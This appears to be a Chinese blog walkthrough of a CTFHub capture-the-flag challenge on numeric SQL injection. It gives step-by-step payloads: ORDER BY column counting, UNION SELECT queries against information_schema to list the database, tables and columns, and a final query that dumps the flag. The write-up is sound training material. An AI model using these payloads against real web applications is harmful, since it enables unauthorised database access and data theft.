1.打开题目,判断是数字型注入还是字符型注入
1.输入1’ //无回显
1‘ --+ //也是没有回显
1” //无回显
1“--= //无回显
都没有回显,所以判断为数字型注入
2.使用命令进行判断列数
1 order by 1 //有回显
1 order by 2 //有回显
1 order by 3 //无回显
说明了回显有两列,
3.判断回显的位置
1 union select 1,2 //发现2有回显位
4.通过回显位进行注入
1 union select 1,database() //查看到了数据库为ctfhub
通过数据库名字进行查询表名
1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctfhub' //查看到了表名为flag,info
通过表名查列名:
1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' //查看列名为flag
通过列名查字段
1 union select 1,flag from ctfhub.flag //查看flag
标签:回显,无回显,ctfhub,union,flag,sql,injection,select From: https://blog.csdn.net/chinese_cabbage0/article/details/140844015